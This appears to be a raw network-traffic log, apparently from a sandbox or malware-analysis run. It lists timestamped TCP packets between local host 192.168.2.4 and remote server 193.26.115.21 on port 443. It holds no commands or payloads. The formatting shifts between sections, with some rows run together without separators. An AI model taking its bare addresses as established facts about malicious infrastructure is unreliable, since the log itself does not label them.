Dec 16, 2024 01:33:05.548415899 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.548415899 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.548480988 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.548543930 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.556186914 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.556225061 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.556360960 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.556360960 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.556425095 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.556482077 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.559683084 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.559834957 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.559861898 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.559921980 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.572009087 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:07.163274050 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:07.163317919 CET | 443 | 49737 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:07.163532972 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:07.444372892 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:07.444456100 CET | 443 | 49737 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:08.974780083 CET | 443 | 49737 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:08.974956989 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:09.032033920 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.21
                                                                      Dec 16, 2024 01:33:09.032114029 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.033143044 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.083117008 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.170592070 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.211406946 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.525785923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.525854111 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.525888920 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.526119947 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.526119947 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.526185989 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.718610048 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.727132082 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727164984 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727180958 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727230072 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727247953 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727266073 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727338076 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.727339029 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.727339029 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.727339029 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.727422953 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.727529049 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.773718119 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773741961 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773757935 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773804903 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773822069 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773839951 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.773920059 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.773920059 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.773920059 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.773920059 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.774000883 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.774897099 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.913593054 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.913618088 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.913661957 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.913691998 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.913691998 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.913731098 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.913770914 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.913923025 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.945730925 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.945792913 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.945956945 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.945957899 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.946022034 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.946796894 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.977613926 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.977655888 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.977730989 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.977798939 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:09.977853060 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:09.977967978 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.093961954 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.093987942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.094108105 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.094171047 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.094218016 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.094297886 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.119674921 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.119698048 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.119822025 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.119822025 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.119887114 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.120083094 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.139450073 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.139471054 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.139571905 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.139571905 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.139657974 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.140794039 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.162288904 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.162314892 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.162451029 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.162451029 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.162514925 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.162597895 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.185074091 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.185095072 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.185245991 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.185245991 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.185309887 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.185360909 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.206438065 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.206479073 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.206609964 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.206609964 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.206641912 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.206680059 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.293513060 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.293555021 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.293693066 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.293693066 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.293724060 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.293772936 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.310018063 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.310090065 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.310220003 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.310220003 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.310251951 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.310298920 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.325267076 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.325314999 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.325426102 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.325426102 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.325459003 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.325506926 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.337625980 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.337666035 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.337810993 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.337810993 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.337841988 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.338164091 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.350716114 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.350764036 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.351109028 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.351140022 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.351187944 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.364726067 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.364767075 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.364816904 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.364851952 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.364876032 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.364891052 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.378727913 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.378772020 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.378920078 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.378920078 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.378952026 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.379018068 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.392888069 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.392946005 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.393071890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.393071890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.393104076 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.393151045 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.484823942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.484874964 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.485074043 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.485074043 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.485138893 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.485198021 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.494358063 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.494400024 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.494576931 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.494576931 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.494642019 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.494697094 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.502283096 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.502324104 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.502500057 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.502500057 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.502563953 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.502623081 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.511050940 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.511095047 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.511259079 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.511259079 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.511360884 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.511421919 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.518910885 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.518954992 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.519141912 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.519141912 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.519207001 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.519274950 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.527276039 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.527334929 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.527415991 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.527415991 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.527481079 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.527533054 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.535710096 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.535752058 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.535902023 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.535902023 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.535967112 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.536030054 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.543174028 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.543214083 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.543387890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.543387890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.543453932 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.543507099 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.674794912 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.675028086 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.781641960 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.781703949 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.781810999 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.781876087 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.781903028 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.781963110 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.781977892 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.782027960 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.782068014 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.782083035 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.782102108 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:10.782135010 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:10.782159090 CET44349737193.26.115.21192.168.2.4
Timestamp                              Source Port  Dest Port    Source IP        Dest IP
Dec 16, 2024 01:33:10.782215118 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.782219887 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.782241106 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.782278061 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.782279015 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.782325983 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.782341003 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.782367945 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.782392025 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.866693020 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.866719007 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.866975069 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.866975069 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.867044926 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.873395920 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.873420954 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.873471975 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.873542070 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.873581886 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.880271912 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.880289078 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.880441904 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.880441904 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.880507946 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.886260986 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.886284113 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.886461973 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.886461973 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.886527061 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.892719984 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.892734051 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.892903090 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.892904043 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.892970085 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.899602890 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.899650097 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.899795055 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.899796009 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.899796009 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.899863005 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.906276941 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.906295061 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.906346083 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.906414032 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.906455040 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.913141966 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.913165092 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:10.913275003 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.913275957 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:10.913341999 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.059343100 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.059432030 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.059498072 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.059556007 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.287333965 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.287535906 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.706994057 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.707061052 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.707077980 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.707149982 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723475933 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723490953 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723515987 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723543882 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723562956 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723582983 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723603010 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723623991 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723644972 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723664045 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723686934 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723723888 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723725080 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.723757029 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723782063 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723809004 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723835945 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723858118 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723891020 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723913908 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723939896 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723967075 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.723997116 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724023104 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724050999 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724050999 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724051952 CET    49737        443          192.168.2.4      193.26.115.21
Dec 16, 2024 01:33:11.724073887 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724117994 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724145889 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724172115 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724196911 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724230051 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724251986 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724272966 CET    443          49737        193.26.115.21    192.168.2.4
Dec 16, 2024 01:33:11.724296093 CET    443          49737        193.26.115.21    192.168.2.4
